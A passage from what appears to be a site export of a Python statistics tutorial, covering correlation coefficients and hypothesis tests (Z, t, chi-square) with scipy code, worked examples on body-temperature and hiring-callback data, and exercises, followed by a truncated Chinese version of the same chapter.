    13.6.3 Point-biserial correlation in Python

    import scipy.stats as stats

    x = [1, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 0, 0, 0]
    y = [84, 82, 76, 60, 72, 74, 76, 84, 88, 90, 78, 80, 92, 94, 96, 88, 90, 78, 76, 74]
    coef, pvalue = stats.pointbiserialr(x, y)
    print('pointbiserialcorrcoef', coef)
    print('pvalue', pvalue)
    pointbiserialcorrcoef 0.7849870641173373
    pvalue 4.145927973490357e-05
    • The point-biserial coefficient is about 0.785, indicating good agreement between the two series

    • The p-value is very small, so the coefficient is statistically significant

    13.7 Categorical correlation analysis

    If both variables describe overall qualitative properties and both are expressed as a handful of categories, the relationship between them is called categorical correlation.

    There are two kinds: contingency correlation and $\varphi$ correlation

    13.7.1 Contingency coefficient

    1 Mathematical definition
    • When at least one variable has more than two categories, the strength of association between the two variables can be measured by the contingency coefficient.

    • Suppose variable $x$ has $a$ categories and $y$ has $b$ categories, with at least one of $a$ and $b$ greater than 2; the contingency coefficient between $x$ and $y$ is denoted C

    • Let $m_{ij}$ be the number of observations falling in category $i$ of $x$ $(i=1,2,\dots,a)$ and category $j$ of $y$ $(j=1,2,\dots,b)$

    $$a_i=\sum_{j=1}^b m_{ij},\quad i=1, 2, \dots, a$$

    $$b_j=\sum_{i=1}^a m_{ij},\quad j=1, 2, \dots, b$$

    Construct the statistic:

    $$\chi^2=N\left(\sum_i\sum_j\frac{m^2_{ij}}{a_ib_j}-1\right)$$

    where $N=\sum_i\sum_j m_{ij}$. This yields the contingency coefficient $C$:

    $$C=\sqrt{\frac{\chi^2}{N+\chi^2}}$$

    For contingency correlation, a chi-square test supports inference about the population: if the chi-square test is significant, so is the contingency coefficient

    2 A worked example

    Compute the contingency coefficient between respondent group and attitude, and test its significance

    Group / Attitude       In favor  Undecided  Opposed  Total
    Lower-grade students        446        212      319    977
    Upper-grade students        273        193      324    790
    Teachers                    262        325      177    764
    Total                       981        730      820   2531

    $\chi^2=N\left(\sum_i\sum_j\frac{m^2_{ij}}{a_i b_j}-1\right) \approx 130.02$

    $C=\sqrt{\frac{\chi^2}{N+\chi^2}}=\sqrt{\frac{130.02}{2531+130.02}}=0.221$

    import numpy as np

    data = np.array([[446, 212, 319],
                     [273, 193, 324],
                     [262, 325, 177]])
    N = data.sum()
    Sum = 0
    for a in range(data.shape[0]):
        for b in range(data.shape[1]):
            Sum += (data[a][b] ** 2) / (data[a].sum() * data.T[b].sum())
    chi_square = N * (Sum - 1)
    C = np.sqrt(chi_square / (N + chi_square))
    print("chi_square:", chi_square)
    print("C:", C)
    chi_square: 130.0172447754466
    C: 0.22104293310887424
    from scipy.stats import chi2

    chi2.isf(0.01, 4)
    13.276704135987625

    Since $\chi^2=130.02>13.277$, the coefficient $C=0.221$ is statistically significant
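
    The same statistic can be checked with scipy's chi2_contingency, which computes Pearson's chi-square directly from the observed table; a sketch:

    import numpy as np
    from scipy.stats import chi2_contingency

    table = np.array([[446, 212, 319],
                      [273, 193, 324],
                      [262, 325, 177]])

    chi2_stat, p, dof, expected = chi2_contingency(table)
    C = np.sqrt(chi2_stat / (table.sum() + chi2_stat))
    print(chi2_stat, p, dof)  # about 130.02, p far below 0.01, dof = 4
    print("C:", C)            # about 0.221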

    13.7.2 $\varphi$ correlation

    1 Mathematical definition

    When both variables are dichotomous, the correlation between them is called the $\varphi$ coefficient

    2×2 contingency table of A and B:

            $B_1$  $B_2$  Total
    $A_1$     a      b    a+b
    $A_2$     c      d    c+d
    Total    a+c    b+d   N=a+b+c+d

    The $\varphi$ coefficient of A and B is then:

    $$r_\varphi=\frac{ad-bc}{\sqrt{(a+b)(a+c)(b+d)(c+d)}}$$

    $$\chi^2=\frac{N(ad-bc)^2}{(a+b)(a+c)(b+d)(c+d)}$$

    It is easy to show that

    $$r_\varphi=\pm\sqrt{\frac{\chi^2}{N}}$$

    (the sign follows the sign of $ad-bc$)

    2 Applying the $\varphi$ coefficient
    R/C     Yes   No   Total
    Boys     22   88     110
    Girls    18   42      60
    Total    40  130     170

    $$\chi^2=\frac{N(ad-bc)^2}{(a+b)(a+c)(b+d)(c+d)}=2.1577$$

    $$\because ad-bc=22\times 42-88\times 18=-660<0$$

    $$\therefore r_\varphi<0$$

    $$r_\varphi=-\sqrt{\frac{\chi^2}{N}}=-0.1127$$

    $$\chi^2<\chi^2_{0.05}(1)=3.84$$

    so the $\varphi$ coefficient is not statistically significant
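
    A sketch computing $r_\varphi$ and $\chi^2$ directly from the 2×2 table above:

    import numpy as np

    a, b, c, d = 22, 88, 18, 42  # the 2x2 table above
    N = a + b + c + d

    r_phi = (a * d - b * c) / np.sqrt((a + b) * (a + c) * (b + d) * (c + d))
    chi2_stat = N * (a * d - b * c) ** 2 / ((a + b) * (a + c) * (b + d) * (c + d))
    print(r_phi)      # about -0.1127 (ad - bc = -660 < 0)
    print(chi2_stat)  # about 2.1577 < 3.84, not significant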

    13.8 Partial and multiple correlation

    13.8.1 Partial correlation

    In a system of several interacting factors, partial correlation studies how closely two factors are related while setting aside the influence of the others

    1 First-order partial correlation

    Controlling for variable 3, the net association between variables 1 and 2 is

    $$r_{12,3}=\frac{r_{12}-r_{13}r_{23}}{\sqrt{(1-r^2_{13})(1-r^2_{23})}}$$

    Three variables admit $C^2_3=3$ first-order partial correlation coefficients

    2 Second-order partial correlation

    $$r_{12,34}=\frac{r_{12,3}-r_{14,3}r_{24,3}}{\sqrt{(1-r^2_{14,3})(1-r^2_{24,3})}}$$

    Four variables admit $C^2_4=6$ second-order partial correlation coefficients

    13.8.2 Multiple correlation

    $$R_{y,12}=\sqrt{1-(1-r^2_{y1})(1-r^2_{y2,1})}$$

    $$R_{y,123}=\sqrt{1-(1-r^2_{y1})(1-r^2_{y2,1})(1-r^2_{y3,12})}$$

    • The multiple correlation coefficient measures how strongly several factors jointly relate to one factor; it lies between 0 and 1

    • The larger the coefficient, the closer the relationship: 1 means complete correlation, 0 means none

    • The multiple correlation coefficient is at least the absolute value of any of the simple correlations

    • It is also at least the absolute value of any partial correlation computed from the same data, i.e. $R_{1,23}\ge|r_{12,3}|$ (see the sketch below)
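
    A minimal sketch of the first-order partial and multiple correlation formulas, with made-up pairwise correlations:

    import numpy as np

    def partial_corr(r12, r13, r23):
        """First-order partial correlation r_{12.3} from pairwise correlations."""
        return (r12 - r13 * r23) / np.sqrt((1 - r13 ** 2) * (1 - r23 ** 2))

    r12, r13, r23 = 0.8, 0.6, 0.7  # made-up pairwise correlations
    r12_3 = partial_corr(r12, r13, r23)

    # Multiple correlation of x1 with (x2, x3), built from r13 and r12.3
    R1_23 = np.sqrt(1 - (1 - r13 ** 2) * (1 - r12_3 ** 2))

    print(r12_3)              # about 0.665: part of the apparent x1-x2
                              # association disappears once x3 is controlled for
    print(R1_23, abs(r12_3))  # R_{1,23} >= |r_{12,3}| holds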

    ]]>
    + 正文

    ]]>
    @@ -10023,7 +10023,7 @@ /posts/Python-%E4%BA%BA%E5%B7%A5%E6%99%BA%E8%83%BD%E6%95%B0%E5%AD%A6%E5%9F%BA%E7%A1%8012/ - 正文:4 应用篇

    12 Hypothesis Testing

    12.1 Basic concepts

    12.1.1 The basic idea of hypothesis testing

    State a hypothesis $H_0$ about the object under test (the null hypothesis), together with an opposing alternative hypothesis $H_1$

    $P\{\color{Red}Z\in \color{Blue}W|H_0$ true$\}\le \color{Green}\alpha\ (\alpha$ small$)$

    $\color{Red}Z$: test statistic

    $\color{Blue}W$: rejection region

    $\color{Green}\alpha$: significance level

    Example 12.1

    The carbon content of molten iron at a steel plant is known to satisfy $X\sim N(4.55, 0.06)$. After a change of process, the mean carbon content of 10 samples of molten iron is $\bar X = 4.57$. Assuming the variance is unchanged, has the population mean $\mu$ changed noticeably?

    Set $H_0:\mu=4.55,\ H_1:\mu\ne4.55$

    Let the event $A:|\bar X-4.55|\ge d,\ d>0,\ \alpha=0.05$; this gives the inequalities:

    $P($reject $H_0$ when $H_0$ true$)=P(|\bar X -4.55|\ge d)\le \alpha$

    $P($reject $H_0$ when $H_0$ true$)=P(|\frac{\bar X -4.55}{\sigma/\sqrt n}|\ge \frac{d}{\sigma/\sqrt n})\le \alpha$

    If the sample observations satisfy:

    $|Z|=|\frac{\bar X -4.55}{\sigma/\sqrt n}| < k\Rightarrow $ accept $H_0$

    $|Z|=|\frac{\bar X -4.55}{\sigma/\sqrt n}| \ge k\Rightarrow $ reject $H_0$ (the rejection region of $H_0$)

    $k = Z_{\alpha/2}$

    From $\alpha=0.05$ we get $Z_{\alpha/2}=1.96$

    $Z=\frac{4.57-4.55}{0.06/\sqrt{10}}=1.054,\ |Z|<Z_{\alpha/2}$, so we accept $H_0$ and conclude the process is normal

    import numpy as np
    from scipy.stats import norm

    mu = 4.55
    sigma = 0.06
    X_bar = 4.57
    n = 10
    alpha = 0.05
    Z_alpha_div_2 = norm.ppf(1 - alpha / 2)
    Z = (X_bar - mu) / (sigma / np.sqrt(n))
    Z, Z_alpha_div_2
    (1.054092553389484, 1.959963984540054)
    import matplotlib.pyplot as plt
    from scipy.stats import norm
    import numpy as np

    alpha = 0.05
    plt.plot(np.linspace(-3, 3, 100), norm.pdf(np.linspace(-3, 3, 100))) # standard normal pdf
    plt.fill_between(np.linspace(-3, norm.ppf(alpha / 2), 50),
                     norm.pdf(np.linspace(-3, norm.ppf(alpha / 2), 50)),
                     alpha=.15, color="red", label="Rejection region |Z|>k")
    plt.fill_between(np.linspace(norm.ppf(1 - alpha / 2), 3, 50),
                     norm.pdf(np.linspace(norm.ppf(1 - alpha / 2), 3, 50)),
                     alpha=.15, color="red")
    plt.fill_between(np.linspace(norm.ppf(alpha / 2), norm.ppf(1 - alpha / 2), 50),
                     norm.pdf(np.linspace(norm.ppf(alpha / 2), norm.ppf(1 - alpha / 2), 50)),
                     alpha=.15, color="blue", label="Acceptance region |Z|<= k")
    plt.legend()
    plt.show() # show the figure

    png

    12.1.2 One-sided and two-sided tests

    • Left-sided test: $H_0:\mu\ge\mu_0($ or $\mu=\mu_0),\ H_1:\mu<\mu_0$, rejection region: $Z\le-Z_\alpha$

    • Right-sided test: $H_0:\mu\le\mu_0($ or $\mu=\mu_0),\ H_1:\mu>\mu_0$, rejection region: $Z\ge Z_\alpha$

    • Two-sided test: $H_0:\mu=\mu_0,\ H_1:\mu\ne\mu_0$, rejection region: $|Z|\ge Z_{\alpha/2}$

    12.1.3 The p-value method

    The above is the critical-value method. The p-value method works as follows: the p-value is the smallest significance level at which the observed value of the test statistic would lead to rejecting the null hypothesis.

    Mathematical foundations, probability 05 (statistical inference: goodness-of-fit tests)

    png

    Example 12.3

    A food factory cans food with an automatic filling machine; the standard weight per can is $\mu_0=500g$

    Assume can weight is a normally distributed random variable with standard deviation $\sigma=10$

    A sample of $n_1 =10$ cans has mean weight $\bar X_1=506g$

    Some time later another sample of $n_2=10$ cans has mean weight $\bar X_2=505g$

    Is the machine working normally at these times?

    Propose $H_0:\mu=\mu_0=500,\ H_1:\mu\ne\mu_0$

    Take $\alpha=0.05$

    $Z_1=\frac{506-500}{10/\sqrt{10}}=1.897,\ Z_2=\frac{505-500}{10/\sqrt{10}}=1.581$

    $P\{Z\ge Z_1\}=P\{Z\ge 1.897\}=1-\Phi(1.897)=0.029>\frac{\alpha}{2}=0.025$

    $P\{Z\ge Z_2\}=P\{Z\ge 1.581\}=1-\Phi(1.581)=0.057>\frac{\alpha}{2}=0.025$

    Accept $H_0$ both times; the second sample supports the null hypothesis more strongly
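
    A sketch of the p-value computation for this example with scipy's norm:

    import numpy as np
    from scipy.stats import norm

    sigma, n, mu0 = 10, 10, 500
    for x_bar in (506, 505):
        Z = (x_bar - mu0) / (sigma / np.sqrt(n))
        p = 1 - norm.cdf(Z)  # one-sided tail, compared against alpha/2
        print(x_bar, round(Z, 3), round(p, 3))
    # 506 -> Z = 1.897, p = 0.029 > 0.025
    # 505 -> Z = 1.581, p = 0.057 > 0.025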

    12.2 Z test (mean of a normal population, variance known)

    $\bar X\sim N(\mu_0, \frac{\sigma^2}{n})$; when $H_0$ holds, $Z=\frac{\bar X -\mu_0}{\sigma/\sqrt n}\sim N(0,1)$

    If the variances $\sigma^2_1$ and $\sigma^2_2$ of the two samples are known, the statistic $Z$ is

    $$Z=\frac{\bar X_1 - \bar X_2}{\sqrt{\frac{\sigma^2_1}{n_1}+\frac{\sigma^2_2}{n_2}}}\sim N(0,1)$$
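
    A minimal sketch of this two-sample Z statistic (all numbers are illustrative):

    import numpy as np
    from scipy.stats import norm

    def two_sample_z(x1_bar, x2_bar, var1, var2, n1, n2):
        """Two-sample Z statistic and two-sided p-value, variances known."""
        Z = (x1_bar - x2_bar) / np.sqrt(var1 / n1 + var2 / n2)
        return Z, 2 * (1 - norm.cdf(abs(Z)))

    print(two_sample_z(506, 505, 100, 100, 10, 10))  # Z about 0.224, p about 0.823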

    12.3 t test (mean of a normal population, variance unknown)

    Since the population variance is unknown, replace the population standard deviation $\sigma$ of the Z test with the sample standard deviation $S$:

    $$T=\frac{\bar X - \mu_0}{S/\sqrt n}\sim t(n-1)$$

    For two independent samples, use the statistic

    $$T=\frac{(\bar X - \bar Y)-(\mu_1-\mu_2)}{S_w\sqrt{\frac{1}{n_1}+\frac{1}{n_2}}}$$

    where

    $$S_w=\sqrt{\frac{(n_1-1)S^2_1+(n_2-1)S^2_2}{n_1+n_2-2}}$$
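
    A sketch of the pooled statistic on two arbitrary samples, checked against scipy's ttest_ind:

    import numpy as np
    from scipy import stats

    x = np.array([74, 71, 72, 68, 76, 73, 67, 70, 65, 74])  # arbitrary sample data
    y = np.array([76, 75, 71, 70, 76, 79, 65, 77, 62, 72])

    n1, n2 = len(x), len(y)
    s1, s2 = x.var(ddof=1), y.var(ddof=1)
    Sw = np.sqrt(((n1 - 1) * s1 + (n2 - 1) * s2) / (n1 + n2 - 2))
    T = (x.mean() - y.mean()) / (Sw * np.sqrt(1 / n1 + 1 / n2))
    print(T)
    print(stats.ttest_ind(x, y).statistic)  # same value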

    12.4 Chi-square test

    For testing hypotheses about an unknown population distribution (a non-parametric test), use the $\chi^2$ goodness-of-fit test.

    The basic idea is to compare the sample observations with the hypothesized distribution function (or probability mass function) and, according to how well they fit, decide whether to accept the null hypothesis, thereby inferring whether the population follows the hypothesized distribution.

    Let the distribution function $F(x)$ of the population $X$ be unknown and $X_1,X_2,\dots,X_n$ a sample from $X$. Test

    $H_0:F(x)=F_0(x),\ H_1:F(x)\ne F_0(x)$, where $F_0(x)$ is a known distribution function

    Pearson's theorem

    If $n$ is sufficiently large (generally $n\ge 50$), then under $H_0$, whatever the distribution of $X$,

    the statistic $\chi^2=\sum^k_{i=1}\frac{(n_i-np_i)^2}{np_i}$ approximately follows $\chi^2(k-r-1)$, where $r$ is the number of unknown parameters of the distribution

    Example 12.12

    Since a city started its prize-draw savings scheme, the digit frequencies over 13 draws are:

    Digit $i$        0   1   2   3   4   5   6   7   8   9   Total
    Frequency $f_i$  21  28  37  36  31  45  30  37  33  52  350

    If the equipment and procedure are sound, the digits should be uniformly distributed. Test $H_0:p_i=\frac{1}{10},\ i=0,1,2,\dots,9$; the expected frequency is $np_i=35$.

    The statistic is $\chi^2=\sum^{10}_{i=1}\frac{(n_i-np_i)^2}{np_i}=\frac{688}{35}=19.657$

    Since $\chi^2_\alpha(k-1)=\chi^2_{0.05}(9)=16.9$ and $19.657>16.9$, reject $H_0$: the equipment or procedure appears faulty
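
    The same test in one call with scipy's chisquare; a sketch:

    from scipy.stats import chisquare

    f_obs = [21, 28, 37, 36, 31, 45, 30, 37, 33, 52]  # observed digit counts
    stat, p = chisquare(f_obs, f_exp=[35] * 10)       # expected 350/10 = 35 per digit
    print(stat, p)  # stat about 19.657, p about 0.02 < 0.05, reject H0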

    12.5 The two types of error in hypothesis testing

    Decision \ Reality   $H_0$ true                       $H_0$ false
    Reject $H_0$         Type I error (false rejection)   correct
    Accept $H_0$         correct                          Type II error (false acceptance)

    $P\{Z\in W\mid H_0\text{ true}\}\le \alpha$

    $P\{Z\notin W\mid H_0\text{ false}\}=\beta$

    Usually one requires the probability of a Type I error not to exceed a preset value $\alpha$ (such as 0.05 or 0.01), while keeping the probability of a Type II error as small as possible

    12.6 Worked example 1: hypothesis tests on physical-exam data

    Variable      Description
    Temperature   body temperature (°F)
    Gender        sex (1 = male, 2 = female)
    Heart Rate    heart rate (beats per minute)

    (1) Show the dataset and its summary statistics (mean, standard deviation, etc.)

    import pandas as pd
    import pylab
    import math
    import numpy as np
    import matplotlib.pyplot as plt
    from scipy.stats import norm
    import scipy.stats
    import warnings
    warnings.filterwarnings('ignore')

    df = pd.read_csv('normtemp.txt', sep=' ', names=['Temperature', 'Gender', 'Heart Rate'])
    df.describe()
    Temperature Gender Heart Rate
    count 130.000000 130.000000 130.000000
    mean 98.249231 1.500000 73.761538
    std 0.733183 0.501934 7.062077
    min 96.300000 1.000000 57.000000
    25% 97.800000 1.000000 69.000000
    50% 98.300000 1.500000 74.000000
    75% 98.700000 2.000000 79.000000
    max 100.800000 2.000000 89.000000

    These show, for each attribute, the count, mean, standard deviation, minimum, maximum, and the quantiles

    df.head()
    Temperature Gender Heart Rate
    0 96.3 1 70
    1 96.7 1 71
    2 96.9 1 74
    3 97.0 1 80
    4 97.1 1 73

    (2) Test whether the body-temperature distribution is normal

    (The method used here is not the one presented earlier in the book...)

    Normality tests: a survey of common methods

    png

    There are several ways to assess normality, falling into two broad classes: graphical methods and test statistics. Graphical methods include the Q-Q plot and the P-P plot; statistical tests include the Kolmogorov-Smirnov test and the Shapiro-Wilk test.

    Samuel Shapiro and Martin Wilk proposed the Shapiro-Wilk test in 1965, observing that the normal probability plot closely resembles linear regression. The normal probability plot is a special case of the Q-Q plot that checks whether a sample matches a given normal distribution, such as the standard normal N(0,1).

    1. Initial check with a histogram
    observed_temperatures = df['Temperature'].sort_values()
    bin_val = np.arange(start=observed_temperatures.min(), stop=observed_temperatures.max(), step=.05)
    mu, std = np.mean(observed_temperatures), np.std(observed_temperatures)
    p = norm.pdf(observed_temperatures, mu, std)
    plt.hist(observed_temperatures, bins=bin_val, density=True, stacked=True)
    plt.plot(observed_temperatures, p, color='red')
    plt.xticks(np.arange(95.75, 101.25, 0.25), rotation=90)
    plt.title('Human Body Temperature Distribution')
    plt.xlabel('human body temperature')
    plt.show()
    print('Average (Mu): ' + str(mu) + ' / ' 'Standard Deviation: ' + str(std))

    png

    Average (Mu): 98.24923076923076 / Standard Deviation: 0.7303577789050376
    2. Normality tests with SciPy
    # Shapiro-Wilk Test: https://en.wikipedia.org/wiki/Shapiro%E2%80%93Wilk_test
    """
    Signature: scipy.stats.shapiro(x)
    x is the data to be tested
    returns (test statistic, p-value)
    """
    shapiro_test, shapiro_p = scipy.stats.shapiro(observed_temperatures)
    print("Shapiro-Wilk Stat:", shapiro_test, "\nShapiro-Wilk p-Value:", shapiro_p)
    """
    Signature: scipy.stats.normaltest(a, axis=0, nan_policy='propagate')
    a is the data to be tested
    axis is the axis along which the test is computed
    returns (the k2 statistic of the test, p-value)
    """
    k2, p = scipy.stats.normaltest(observed_temperatures)
    print('p:', p)
    Shapiro-Wilk Stat: 0.9865769743919373
    Shapiro-Wilk p-Value: 0.2331680953502655
    p: 0.2587479863488212
    3. Checking normality with a quantile-quantile (Q-Q) plot
    # stats.probplot(QQ 图)
    scipy.stats.probplot(observed_temperatures, dist="norm", plot=pylab)
    pylab.show()

    png

    4. Normality check based on the ECDF (empirical cumulative distribution function)

    Generate a normal sample from the current sample's mean and standard deviation, then compare its cumulative distribution function with that of the data; if the observed difference is large enough, the test rejects the hypothesis that the population is normal

    def ecdf(data):
        """Compute ECDF"""
        n = len(data)
        x = np.sort(data)
        y = np.arange(1, n + 1) / n
        return x, y

    # Compute empirical mean and standard deviation

    # Number of samples
    n = len(df['Temperature'])

    # Sample mean
    mu = np.mean(df['Temperature'])

    # Sample standard deviation
    std = np.std(df['Temperature'])

    print('Mean temperature: ', mu, 'with standard deviation of +/-', std)

    # Draw a random normal sample with the data's mean and standard deviation
    normalized_sample = np.random.normal(mu, std, size=10000)
    x_temperature, y_temperature = ecdf(df['Temperature'])
    normalized_x, normalized_y = ecdf(normalized_sample)

    # Plot the ECDFs
    fig = plt.figure(figsize=(8, 5))
    plt.plot(normalized_x, normalized_y)
    plt.plot(x_temperature, y_temperature, marker='.', linestyle='none')
    plt.ylabel('ECDF')
    plt.xlabel('Temperature')
    plt.legend(('Normal Distribution', 'Sample data'))
    Mean temperature:  98.24923076923076 with standard deviation of +/- 0.730357778905038
    <matplotlib.legend.Legend at 0x1bc43440b20>

    png

    3 Some scholars claim that 98.6°F (37°C) is the average human body temperature; do we accept this claim?

    from scipy import stats

    CW_mu = 98.6
    # one-sample t test
    stats.ttest_1samp(df['Temperature'], CW_mu, axis=0)
    Ttest_1sampResult(statistic=-5.454823292364077, pvalue=2.410632041561008e-07)

    $pvalue\approx0$, so reject the null hypothesis

    4 Do male and female body temperatures differ noticeably?

    female_temp = df.Temperature[df.Gender == 2]
    male_temp = df.Temperature[df.Gender == 1]

    # When it is unclear whether the two populations share a variance, first run
    # Levene's test for homogeneity of variance
    # (norm.rvs draws one random value per observation, so this result varies run to run)
    rvs1 = stats.norm.rvs(female_temp)
    rvs2 = stats.norm.rvs(male_temp)
    print(stats.levene(rvs1, rvs2))

    mean_female_temp = np.mean(female_temp)
    mean_male_temp = np.mean(male_temp)
    print('Average female body temperature = ' + str(mean_female_temp))
    print('Average male body temperature = ' + str(mean_male_temp))

    # Compute independent t-test
    """
    T-test for the means of two independent samples.
    Tests the null hypothesis that the two samples have the same expected value;
    by default it assumes the populations have equal variances.
    """
    print(stats.ttest_ind(female_temp, male_temp, axis=0))
    LeveneResult(statistic=2.1897731829800553, pvalue=0.14138681028945846)
    Average female body temperature = 98.39384615384616
    Average male body temperature = 98.1046153846154
    Ttest_indResult(statistic=2.2854345381654984, pvalue=0.02393188312240236)

    The LeveneResult differs from run to run, but its $pvalue$ is always well above 0.05, so the two populations can be taken to have equal variances

    The $pvalue$ of Ttest_indResult is below the 0.05 significance level, so with more than 95% confidence the two means differ

    12.7 Worked example 2: does race affect job applications?

    import pandas as pd
    import numpy as np
    from scipy import stats

    data = pd.io.stata.read_stata('us_job_market_discrimination.dta')
    data.head()
    id ad education ofjobs yearsexp honors volunteer military empholes occupspecific ... compreq orgreq manuf transcom bankreal trade busservice othservice missind ownership
    0 b 1 4 2 6 0 0 0 1 17 ... 1.0 0.0 1.0 0.0 0.0 0.0 0.0 0.0 0.0
    1 b 1 3 3 6 0 1 1 0 316 ... 1.0 0.0 1.0 0.0 0.0 0.0 0.0 0.0 0.0
    2 b 1 4 1 6 0 0 0 0 19 ... 1.0 0.0 1.0 0.0 0.0 0.0 0.0 0.0 0.0
    3 b 1 3 4 6 0 1 0 1 313 ... 1.0 0.0 1.0 0.0 0.0 0.0 0.0 0.0 0.0
    4 b 1 3 3 22 0 0 0 0 313 ... 1.0 1.0 0.0 0.0 0.0 0.0 0.0 1.0 0.0 Nonprofit

    5 rows × 65 columns

    blacks = data[data.race == 'b']
    whites = data[data.race == 'w']
    blacks.call.describe()
    count    2435.000000
    mean        0.064476
    std         0.245649
    min         0.000000
    25%         0.000000
    50%         0.000000
    75%         0.000000
    max         1.000000
    Name: call, dtype: float64
    whites.call.describe()
    count    2435.000000
    mean        0.096509
    std         0.295346
    min         0.000000
    25%         0.000000
    50%         0.000000
    75%         0.000000
    max         1.000000
    Name: call, dtype: float64

    The callback rate is 6.4% for black applicants and 9.7% for white applicants

    blacks_called = len(blacks[blacks['call'] == True])
    blacks_not_called = len(blacks[blacks['call'] == False])
    whites_called = len(whites[whites['call'] == True])
    whites_not_called = len(whites[whites['call'] == False])
    observed = pd.DataFrame({'blacks': {'called': blacks_called, 'not_called': blacks_not_called},
                             'whites': {'called': whites_called, 'not_called': whites_not_called}})
    observed
                blacks  whites
    called         157     235
    not_called    2278    2200
    # Count the applicants who did and did not receive a callback
    num_called_back = blacks_called + whites_called
    num_not_called = blacks_not_called + whites_not_called
    # Overall callback rate
    rate_of_callbacks = num_called_back / (num_not_called + num_called_back)
    # Expected counts of callbacks and non-callbacks
    expected_called = len(data) * rate_of_callbacks
    expected_not_called = len(data) * (1 - rate_of_callbacks)
    # Expected 2x2 table (equal callback rates for black and white applicants)
    expected = pd.DataFrame({'blacks': {'called': expected_called / 2, 'not_called': expected_not_called / 2},
                             'whites': {'called': expected_called / 2, 'not_called': expected_not_called / 2}})
    expected
                blacks  whites
    called       196.0   196.0
    not_called  2239.0  2239.0
    import scipy.stats as stats

    observed_frequencies = [blacks_not_called, whites_not_called, whites_called, blacks_called]
    expected_frequencies = [expected_not_called / 2, expected_not_called / 2, expected_called / 2, expected_called / 2]
    # chi-square test
    stats.chisquare(f_obs=observed_frequencies, f_exp=expected_frequencies)
    Power_divergenceResult(statistic=16.87905041427022, pvalue=0.0007483959441097264)

    The p-value (0.00075) is far below 0.05 (equivalently, $\chi^2=16.88>\chi^2_{0.05}(1)=3.84$), so racial discrimination in callbacks appears to be real

    12.9 Exercises

    1 t test

    Crops A and B are planted on 10 plots each; their yields are normally distributed with equal variance.

    The computed statistics are $\bar X=30.97,\ \bar Y=21.79,\ S_x=26.7,\ S_y=12.1$. Is there a significant difference between the yields of the two crops?

    import numpy as np
    from scipy import stats

    mean1 = 30.97
    mean2 = 21.79

    std1 = 26.7
    std2 = 12.1

    nobs1 = 10
    nobs2 = 10

    modified_std1 = np.sqrt(np.float32(nobs1) / np.float32(nobs1-1)) * std1
    modified_std2 = np.sqrt(np.float32(nobs2) / np.float32(nobs2-1)) * std2

    (statistic, pvalue) = stats.ttest_ind_from_stats(mean1=mean1, std1=modified_std1, nobs1=10, mean2=mean2, std2=modified_std2, nobs2=10)

    print("t statistic is: ", statistic)
    print("pvalue is: ", pvalue)
    t statistic is:  0.9394886573346275
    pvalue is:  0.35991721678518696

    $pvalue\ge 0.05$: no significant difference

    2 Chi-square test

    Two classes are sampled at random from a secondary school; do their attitudes toward splitting into science and humanities tracks differ significantly ($\alpha=0.05$)?

    Chi-square test (independence of two categorical variables) and chi2_contingency

             In favor  Opposed  Total
    Class A        37       27     64
    Class B        39       21     60
    Total          76       48    124

    degrees of freedom = (rows - 1) × (columns - 1) = 1

    $\chi^2=\frac{N(AD-BC)^2}{(A+B)(C+D)(A+C)(B+D)}=\frac{124\times(37\times 21-27\times 39)^2}{64\times 60\times 76\times 48}\approx 0.674<\chi^2_{0.05}(1)=3.843$

    So there is no significant difference

    from scipy.stats import chi2_contingency
    import numpy as np

    kf_data = np.array([[37, 27], [39, 21]])
    kf = chi2_contingency(kf_data)  # applies Yates' continuity correction for 2x2 tables
    print('chisq-statistic=%.4f, p-value=%.4f, df=%i expected_frep=%s' % kf)
    chisq-statistic=0.4054, p-value=0.5243, df=1 expected_frep=[[39.22580645 24.77419355]
     [36.77419355 23.22580645]]

    $p\text{-}value>0.05$, so there is no significant difference

    ]]>
    + 正文:4 应用篇

    12 假设检验

    12.1 假设检验的基本概念

    12.1.1 假设检验的基本思想

    根据实际情况的要求对检验对象提出一个假设$H_0$(称为原假设), 同时提出一个与原假设对立的备设假设$H_1$

    $P\{\color{Red}Z\in \color{Blue}W|H_0$为真$\}\le \color{Green}\alpha (\alpha$很小$)$

    $\color{Red}Z$: 检验统计量

    $\color{Blue}W$: 区域

    $\color{Green}\alpha$: 显著性水平

    例 12.1

    已知某炼铁厂的铁水含碳量$X\sim N(4.55, 0.06)$, 现改变了工艺条件, 又测得 10 种贴水的平均含碳量$\bar X = 4.57$, 假设方差无变化, 问总体均值$\mu$是否有明显改变?

    设$H_0:\mu=4.55,H_1:\mu\ne4.55$

    令事件$A:|\bar X-4.55|\ge d,d>0, \alpha=0.05$得到不等式:

    $P($当$H_0$为真, 拒绝$H_0)=P(|\bar X -4.55|\ge d)\le \alpha$

    $P($当$H_0$为真, 拒绝$H_0)=P(|\frac{\bar X -4.55}{\sigma/\sqrt n}|\ge \frac{d}{\sigma/\sqrt n})\le \alpha$

    若 X 的样本观察值满足:

    $|Z|=|\frac{\bar X -4.55}{\sigma/\sqrt n}| < k\Rightarrow $接受$H_0$

    $|Z|=|\frac{\bar X -4.55}{\sigma/\sqrt n}| \ge k\Rightarrow $拒绝$H_0$($H_0$的拒绝域)

    $k = Z_{\alpha/2}$

    由$\alpha=0.05$得$Z_{\alpha/2}=1.96$

    $Z=\frac{4.57-4.55}{0.66/\sqrt{10}}, |Z|<Z_{\alpha/2}$, 认为接受原假设$H_0$, 认为工艺是正常的

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    import numpy as np
    from scipy.stats import norm

    mu = 4.55
    sigma = 0.06
    X_bar = 4.57
    n = 10
    alpha = 0.05
    Z_alpha_div_2 = norm.ppf(1 - alpha / 2)
    Z = (X_bar - mu) / (sigma / np.sqrt(n))
    Z, Z_alpha_div_2
    (1.054092553389484, 1.959963984540054)
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    import matplotlib.pyplot as plt
    from scipy.stats import norm
    import numpy as np

    alpha = 0.05
    plt.plot(np.linspace(-3, 3, 100), norm.pdf(np.linspace(-3, 3, 100))) # 绘制曲线
    plt.fill_between(np.linspace(-3, norm.ppf(alpha / 2), 50),
    norm.pdf(np.linspace(-3, norm.ppf(alpha / 2), 50)),
    alpha=.15, color="red", label="Rejection region |Z|>k")
    plt.fill_between(np.linspace(norm.ppf(1 - alpha / 2), 3, 50),
    norm.pdf(np.linspace(norm.ppf(1 - alpha / 2), 3, 50)),
    alpha=.15, color="red")
    plt.fill_between(np.linspace(norm.ppf(alpha / 2), norm.ppf(1 - alpha / 2), 50),
